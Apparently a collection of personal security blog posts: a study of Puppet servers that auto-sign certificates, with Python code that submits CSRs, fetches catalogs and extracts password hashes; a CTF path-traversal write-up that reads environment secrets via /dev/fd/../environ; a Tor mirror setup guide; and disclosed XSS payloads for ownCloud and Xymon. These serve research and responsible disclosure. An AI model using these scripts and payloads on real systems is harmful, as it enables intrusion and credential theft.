Looking at public Puppet servers

This is about research I did a while ago but only now found the time to write about.

At the beginning of this year I was curious to see how many Puppet 3 servers – freshly end-of-life back then – were connected directly to the internet.

If you don’t know Puppet: it’s a configuration management system that holds the information needed to deploy systems and services in your infrastructure. You write code which defines how a system should be configured, e.g. which software to install, which users to deploy, how a service is configured, etc.
It typically uses a client-server model: the clients periodically pull their configuration (the “catalog”) from their configured server and apply it locally. Everything is transferred over TLS-encrypted connections.

Puppet uses TLS client certificates to authenticate nodes. When a client (“puppet agent”) connects to a server for the first time, it generates a key locally and submits a certificate signing request to the server.
An operator needs to sign the certificate, and from that point on the agent can pull its configuration from the server.

However, it is possible to configure Puppet server to automatically sign all incoming CSRs.
This is obviously not recommended unless you want anyone to be able to obtain potentially sensitive information about your infrastructure. The Puppet documentation mentions several times that this is insecure: https://docs.puppet.com/puppet/3.8/ssl_autosign.html#nave-autosigning

First I was interested in whether anyone was already looking for servers configured like this.
I set up a honeypot Puppet server with auto-signing enabled and waited.
But even after months not a single CSR had been submitted; only port scanners tried to connect to it.

I decided to look for those servers myself.
With a small script I looped over around 2500 servers that were still online – there were more, but due to time constraints I only checked 2500. I built a system that connects to each of those servers and submits a CSR. The “certname” – this is what operators will see when reviewing CSRs – was always the same, and it was pretty obvious that it was not a legitimate request.
An attacker would do more recon, get the FQDNs of the Puppet server from its certificate and try to guess a more likely name.
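
A minimal sketch of this CSR-submission step could look like the following, assuming a reasonably recent requests/cryptography and the Puppet 3 HTTP API endpoints as I remember them (server name, certname and key size are purely illustrative):

import requests
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

server   = "puppet.example.com"       # hypothetical target
certname = "research-node.example"    # the name an operator would later see in the CSR list

# Generate a key pair and a CSR with the certname as CN, just like a fresh agent would.
key = rsa.generate_private_key(public_exponent=65537, key_size=4096)
csr = (x509.CertificateSigningRequestBuilder()
       .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, certname)]))
       .sign(key, hashes.SHA256()))

# Submit the CSR. With naive auto-signing enabled the server signs it right away and the
# signed certificate can then be fetched from /production/certificate/<certname>.
requests.put(
    "https://%s:8140/production/certificate_request/%s" % (server, certname),
    data=csr.public_bytes(serialization.Encoding.PEM),
    headers={"Content-Type": "text/plain"},
    verify=False,  # at this point we do not have the server's CA certificate
)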

Out of those 2500 servers:

  • 89 immediately signed our certificate.

Out of those 89:

  • 50 compiled a valid catalog that could have been applied directly.
  • 39 tried to compile a catalog and failed with issues that could potentially be worked around on the client, but no time was spent on that.
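
For a server that has signed the request, retrieving a catalog is essentially one authenticated GET against the Puppet 3 HTTP API. A sketch under the same assumptions (endpoint path and Accept header are from memory; a real agent also submits its facts with the request, which some manifests need in order to compile):

import requests

server, certname = "puppet.example.com", "research-node.example"   # hypothetical names

# Authenticate with the signed certificate and the private key generated for the CSR
# (stored here as local files). Puppet 3 serves catalogs as PSON, a JSON dialect.
r = requests.get(
    "https://%s:8140/production/catalog/%s" % (server, certname),
    cert=("%s.pem" % certname, "%s.key" % certname),
    headers={"Accept": "pson"},
    verify=False,
)
print(r.status_code, len(r.content))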

It is a normal setup to have a default role: if an unknown node connects, it may get only this configuration applied. Usually this deploys the Administrator user accounts and sets generic settings. This happened a lot, and it is already problematic since those system accounts also get their password hashes configured, which can now be brute-forced. A lot of servers also conveniently send along their sudoers configuration, so an attacker could target higher-privileged accounts directly.
But some of those servers automatically assigned more than just the default role: exposing root SSH keys, AWS credentials, configuration files of their services (Nginx, PostgreSQL, MySQL, …), trying to copy source code onto the node, and handing out passwords / password hashes of database and other service users:

And more. There are systems that could be immediately compromised with the information they leak. The others at least tell attackers a lot about the system, which makes further attacks much easier.
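
To get an idea of what such a catalog leaks, a few lines of post-processing are enough. The resource layout below is the Puppet 3 wire format as I remember it (resources under data.resources with type, title and parameters), so treat the exact keys as assumptions:

import json   # PSON parses fine as JSON for this purpose

catalog = json.load(open("catalog.pson"))
resources = catalog.get("data", catalog).get("resources", [])

# List user resources that ship a password hash – exactly the kind of thing
# an attacker would take home and brute-force offline.
for res in resources:
    if res.get("type") == "User" and "password" in res.get("parameters", {}):
        print(res.get("title"), res["parameters"]["password"])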

Here is where it gets interesting: one day later I connected to the same 2500 servers again, using the same keys from the day before, and tried to retrieve a catalog. Normally we’d expect the numbers to stay the same or drop slightly. But in this case they did not:

  • 145 servers allowed us to connect.
  • 58 gave us a valid catalog that could be applied.

And one week later:

  • 159 servers allowed us to connect.
  • 63 gave us a valid catalog that could be applied.

Those servers were not offline during the first round either. Either they simply signed my CSR in the meantime without noticing that it was not one of their own requests, or – and this is what I suspect – it is a combination of the following two issues:

1) Generally, when working with Puppet certificates, you use “puppet cert $sub-command” to handle the TLS operations for you.

The problem is that there is no way to tell it to simply reject a signing request.
You can “revoke” or “clean” certificates, but the certificate has to be signed first (see: https://tickets.puppetlabs.com/browse/PUP-1916).
There may have been an option using the “puppet ca” command, but it has been deprecated and pretty much all documentation only mentions “puppet cert” nowadays.

You are left with these options:

  • Manually figure out where the .csr file is stored on the server and remove it
  • Use the deprecated tool “puppet ca destroy $certname”
  • Run “puppet cert sign $certname && puppet cert clean $certname”
  • Run “puppet cert sign $certname && puppet cert revoke $certname”

Some are unfortunately using the last two options.

There is the possibility that on some of those systems my certificate request was signed, if only for a few seconds. That brings us to the next issue:

2) Puppet server – or in some cases the reverse proxy in front of it – only reads the certificate revocation list at startup time.
If you don’t restart these services after revoking a certificate, the revoked client will still be allowed to connect.

“puppet cert revoke $certname” basically only adds the certificate to the CRL. It does not remove the signed certificate from the server.
I suspect that some operators have signed and revoked my certificate but haven’t restarted the service afterwards.

“puppet cert clean $certname”, on the other hand, additionally removes the signed certificate from the server; when my client connects later it cannot fetch the signed certificate and is locked out.
This isn’t perfect either: if the client constantly requests the certificate it could retrieve it before the “clean” runs, but it is far better than only using “revoke”.
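
If you want to verify what a “revoke” actually did, checking the CA’s CRL directly only takes a few lines. A sketch using the Python cryptography library; the paths are the Puppet 3 defaults as I remember them and the certname is hypothetical, so adjust both:

from cryptography import x509

ssldir   = "/var/lib/puppet/ssl"     # assumption: default Puppet 3 ssldir on the CA
certname = "agent01.example.com"     # hypothetical agent

crl  = x509.load_pem_x509_crl(open(ssldir + "/ca/ca_crl.pem", "rb").read())
cert = x509.load_pem_x509_certificate(open(ssldir + "/ca/signed/" + certname + ".pem", "rb").read())

# A certificate counts as revoked once its serial number shows up in the CRL – but the
# running Puppet server only notices that after it has re-read the CRL, i.e. after a restart.
revoked = crl.get_revoked_certificate_by_serial_number(cert.serial_number)
print(certname, "is revoked" if revoked is not None else "is NOT revoked")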

Depending on how you use Puppet, it may be one of your most critical systems, containing the keys to your kingdom. There are very few cases where it makes sense to expose a Puppet server directly to the internet.
Those systems should be the best protected systems in your infrastructure; a compromised Puppet server essentially compromises all clients that connect to it.

Basic or naïve auto-signing should not be used in a production environment unless you can ensure that only trusted clients can reach the Puppet server. Otherwise, only policy-based auto-signing or manual signing is secure.
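
For completeness: a policy-based auto-signing hook is just an executable (referenced by the autosign setting) that Puppet calls with the requested certname as its first argument and the PEM-encoded CSR on stdin, and that signals “sign” with exit code 0. A minimal sketch; the path and the allowed suffix are obviously assumptions about your own setup:

#!/usr/bin/env python
# Hypothetical autosign policy script, referenced via "autosign = /etc/puppet/autosign-policy.py"
# in the [master] section of puppet.conf (the script must be executable).
import sys

ALLOWED_SUFFIX = ".internal.example.com"   # assumption: your own node naming scheme

certname = sys.argv[1]        # Puppet passes the requested certname as the first argument
csr_pem  = sys.stdin.read()   # the PEM-encoded CSR; one could also verify an embedded shared secret here

# Exit 0 to sign the request, anything else to reject it.
sys.exit(0 if certname.endswith(ALLOWED_SUFFIX) else 1)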

Google CTF 2017 mindreader

This is a write-up for the Google CTF 2017 “mindreader” challenge.

The mindreader webserver presented us with only a single input form:


Pretty much with the second input we tried, it was clear that any filename specified in the form would be read from the local disk. This sounded like an easy challenge.
Better yet, since /etc/shadow was also displayed, the process was probably running with root privileges. Jackpot!

The logical next step was to try to fetch the usual files you would expect to contain something useful: service configuration files, shell histories, log files – pretty much anything we could think of – but nothing useful was returned.

Some files that we expected to exist, like /etc/ssh/sshd_config, returned a 404 and others (/proc/cpuinfo) a 403.

The HTTPS server responded with an nginx server header, but there was no sign of nginx anywhere either, nor of any other webserver.

With /etc/issue and /etc/debian_version the system was identified as Debian 8.8.
Digging into the Debian-specific files, we grabbed /var/log/apt/history.log:

That file showed that the following packages were all installed in a single transaction:

git mercurial pkg-config wget python-pip python2.7 python2.7-dev 
python3.4 python3.4-dev build-essential libcurl4-openssl-dev libffi-dev 
libjpeg-dev libmysqlclient-dev libpng12-dev libpq-dev libssl-dev 
libxml2-dev libxslt1-dev swig zlib1g-dev gfortran libatlas-dev 
libblas-dev libfreetype6-dev liblapack-dev libquadmath0 
libmemcached-dev libsasl2-2 libsasl2-dev libsasl2-modules sasl2-bin

Searching for that specific package list leads us to the Google Cloud Platform – Python Runtime Docker Image:
https://github.com/GoogleCloudPlatform/python-runtime/blob/master/runtime-image/resources/apt-packages.txt

This explains the absence of pretty much any other service or configuration: We are attacking a Docker container.

The Dockerfile in that repository configures a work directory of /app. With that knowledge we can get the Python source code by requesting /app/main.py:

The source code revealed two key pieces of information:

  • There is an environment variable called “FLAG” (line 6).
  • Requests containing “proc” will always return a 403 (line 24).

Coincidentally, environment variables are of course exposed under /proc (in /proc/<pid>/environ).

The filter looked solid and Python’s open() does not accept wildcards. We could not request anything containing “proc”.

But if there is a symlink pointing to a folder inside /proc, we wouldn’t need to request a file with “proc” in its name; we could traverse from there.

Quick research in a Vagrant VM showed that /dev/fd is a symlink to /proc/self/fd.
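
This is easy to reproduce locally on most Linux systems, no CTF required: because /dev/fd is a symlink to /proc/self/fd, the “..” is resolved inside /proc/self, so the path ends up at the environment of whichever process opens it:

# Both reads should return the identical NUL-separated environment block of this process.
with open("/dev/fd/../environ", "rb") as f:
    via_dev_fd = f.read()
with open("/proc/self/environ", "rb") as f:
    via_proc = f.read()

assert via_dev_fd == via_proc
print(via_dev_fd.split(b"\0")[:3])   # print a few KEY=value entries as a sanity check
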
We requested /dev/fd/../environ:


And with that we finally got the flag.


CentOS Tor mirror

I’m running a CentOS Tor mirror as a hidden service.
It is available under:

http://vnokiymjbiklyocz.onion/

If you want to use this mirror you must first install Tor.
Follow these instructions to do that:
https://www.torproject.org/docs/rpms.html.en

Once that is complete and the Tor service is running you must install torsocks (from the EPEL repositories):

[root@localhost ~]# yum install epel-release
(...)

Complete!
[root@localhost ~]# yum install torsocks
(...)

Complete!

Afterwards, change the YUM repository configuration file (/etc/yum.repos.d/CentOS-Base.repo) to include the hidden service URL.
Create a backup of the file in case you want to use the normal mirrors again.
The adjusted file should look like this (on CentOS 7):

[base]
name=CentOS-$releasever - Base
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/os/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

[updates]
name=CentOS-$releasever - Updates
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/updates/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

[extras]
name=CentOS-$releasever - Extras
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/extras/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

[centosplus]
name=CentOS-$releasever - Plus
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/centosplus/$basearch/
gpgcheck=1
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

If you edited the configuration file manually, please note that it now uses the baseurl option and not the mirrorlist option as before.

With this in place you can now use the hidden mirror and install packages like this:

[root@localhost ~]# export TORSOCKS_LOG_LEVEL=1 # only required to stop getting spammed with warning messages
[root@localhost ~]# torsocks yum -y install bind-utils
Loaded plugins: fastestmirror
base                                                                                                                                      | 3.6 kB  00:00:00     
epel/x86_64/metalink                                                                                                                      |  26 kB  00:00:00     
epel                                                                                                                                      | 4.3 kB  00:00:00     
extras                                                                                                                                    | 3.4 kB  00:00:00     
tor/x86_64/signature                                                                                                                      |  490 B  00:00:00     
tor/x86_64/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
tor-source/signature                                                                                                                      |  490 B  00:00:00     
tor-source/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
updates                                                                                                                                   | 3.4 kB  00:00:00     
(1/9): base/7/x86_64/group_gz                                                                                                             | 155 kB  00:00:00     
(2/9): epel/x86_64/group_gz                                                                                                               | 169 kB  00:00:00     
(3/9): epel/x86_64/updateinfo                                                                                                             | 449 kB  00:00:00     
(4/9): extras/7/x86_64/primary_db                                                                                                         |  90 kB  00:00:00     
(5/9): tor-source/primary_db                                                                                                              | 2.4 kB  00:00:01     
(6/9): tor/x86_64/primary_db                                                                                                              | 4.0 kB  00:00:01     
(7/9): updates/7/x86_64/primary_db                                                                                                        | 953 kB  00:00:01     
(8/9): epel/x86_64/primary_db                                                                                                             | 3.7 MB  00:00:02     
(9/9): base/7/x86_64/primary_db                                                                                                           | 5.3 MB  00:00:05     
Determining fastest mirrors
 * epel: mirror.netcologne.de
Resolving Dependencies
--> Running transaction check
---> Package bind-utils.x86_64 32:9.9.4-29.el7_2.1 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

=================================================================================================================================================================
 Package                               Arch                              Version                                        Repository                          Size
=================================================================================================================================================================
Installing:
 bind-utils                            x86_64                            32:9.9.4-29.el7_2.1                            updates                            200 k

Transaction Summary
=================================================================================================================================================================
Install  1 Package

Total download size: 200 k
Installed size: 434 k
Downloading packages:
bind-utils-9.9.4-29.el7_2.1.x86_64.rpm                                                                                                    | 200 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 
  Verifying  : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 

Installed:
  bind-utils.x86_64 32:9.9.4-29.el7_2.1                                                                                                                          

Complete!

Contact me if you need any help or if you have any suggestions.

XSS in ownCloud 2

A few weeks ago ownCloud 4.0.0 was released and it included some cool features like encryption of uploaded files. I decided to take it for a spin again.

I again found some XSS vulnerabilities. As last time, I reported these issues to the ownCloud team, which responded quickly and has already fixed them (with version 4.0.2). As far as I can tell, CVE-2012-4396 was assigned to these issues (and others were merged into it as well).

/?app=media
1) change the ID3 title tag of an MP3 file to: “Kalimba<script>alert(1)</script>”
2) upload
3) play it in the integrated player, JS gets executed

Now this is fun! Imagine someone sending you an MP3 which you listen to in ownCloud while, in the background, your cookies are sent to a remote system. If you run an ownCloud instance with multiple users, you can also share those files. It might be enough to listen to a shared MP3 to get your account compromised – I didn’t verify this though.

/?app=files&getfile=download.php
1) upload a picture, e.g. trollface.jpg
2) rename the picture to “trollf<style onload=alert(1)>ace.jpg”
3) view the picture, JS gets executed

Can’t think of a good scenario for this to be useful. Maybe sharing this file.

/?app=calendar
1) add new appointment, title: “XSS <script>alert(1);</script>”
2) switch calendar view to “list”, JS gets executed

This was a bit surprising as the normal calendar view was not affected, only the list view.

XSS in ownCloud

A few weeks ago there was a bit of hype around ownCloud when they released version 3.0.1. I decided to give it a spin; here is what I found.

Note: I contacted the development team earlier and these vulnerabilities have been fixed in the meantime with version 3.0.2, although I have not confirmed this myself due to lack of time.

XSS in files/download.php

The attacker can send a URL to the victim and JavaScript will be executed in the victim’s session. The attacker does not need an account on the ownCloud instance, only knowledge of the URL path:


http://localhost/owncloud/files/download.php?file=/xss.png%3Cscript%3Ealert(1)%3C/script%3E

XSS in files/index.php

If you share your ownCloud instance with multiple users, the attacker can send a URL to the victim and JavaScript will be executed in the victim’s session. Both the attacker and the victim need accounts on the same instance.

Here is how:

1) Create a new folder on http://localhost/owncloud/files/index.php – any name will do, I used “PoC”

2) Share this folder with your victim or the victims group

3) Switch to http://localhost/owncloud/files/index.php?dir=/PoC

4) Create a folder, called:

x"> <body onload=alert(1)><x="

5) Send that link to your victim:


http://localhost/owncloud/files/index.php?dir=/Shared/PoC/x%22%3E%20%3Cbody%20onload%3Dalert%281%29%3E%3Cx%3D%22

6) ???

7) Profit!

It may be possible to create the folder directly in /; however, I couldn’t get that folder shared with other users. But since it gets automatically shared if the parent folder is shared, I didn’t invest much time into that.

XSS in apps/contacts/index.php

I found another XSS flaw in the Contacts function: creating a contact and adding this to any field:

foo"><script>alert(1)</script>

will also execute the JavaScript. However, since you cannot share contacts between users (or can you?), I believe this is a minor problem.

XSS in Xymon

Last week I had some time to play with the monitoring tool Xymon. Xymon is monitoring and alerting software mostly written in C. Its server component provides you with a web interface to check the health of your systems. I only quickly investigated this web interface.

After walking through the various kinds of pages I found that almost all parameters are correctly checked or sanitized. But on one page the code was doing something odd (criticalview.c):

fprintf(output, "<a href=\"%s&NKPRIO=%d&NKTTGROUP=%s&NKTTEXTRA=%s\">",
        hostsvcurl(itm->hostname, colname, 1),
        prio,
        htmlgroupstr, htmlextrastr);

This is strange: the htmlgroupstr and htmlextrastr variables do not get used anywhere else in criticalview.c. The link it generates points to svcstatus.c (well, its wrapper, svcstatus.sh). On that page the NKTTGROUP and NKTTEXTRA parameters simply get displayed, without any further cleanup. With that we can generate links like this:

http://localhost/xymon-cgi/svcstatus.sh?HOST=foo&SERVICE=cpu&NKPRIO=1&NKTTGROUP=admins&NKTTEXTRA=foo%3Cscript%3Ealert(1);%3C/script%3E

This nicely executes our injected JavaScript. The bug was reported at SourceForge.